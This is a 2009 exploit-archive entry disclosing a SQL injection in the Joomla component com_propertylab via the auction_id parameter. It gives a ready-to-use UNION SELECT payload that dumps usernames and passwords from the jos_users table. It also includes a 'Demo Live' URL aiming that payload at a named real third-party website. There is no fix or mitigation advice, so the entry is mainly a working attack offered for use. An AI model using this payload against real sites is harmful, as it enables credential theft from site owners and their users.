[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_propertylab (auction_id) SQL injection Vuln
# Published : 2009-07-10
# Author : Chip D3 Bi0s
# Previous Title : Jobbr 2.2.7 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Digitaldesign CMS 0.1 Remote Database Disclosure Vulnerability


--------------------------------------------------------------------------
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
--------------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################


Example:

http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>

<Sql Code>:
+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
 

Demo Live (1):

http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users


Thanks for all Str0ke
and you are unbeatable :)

+++++++++++++++++++++++++++++++++
[!] Produced in South America
---------------------------------

# www.Syue.com [2009-07-10]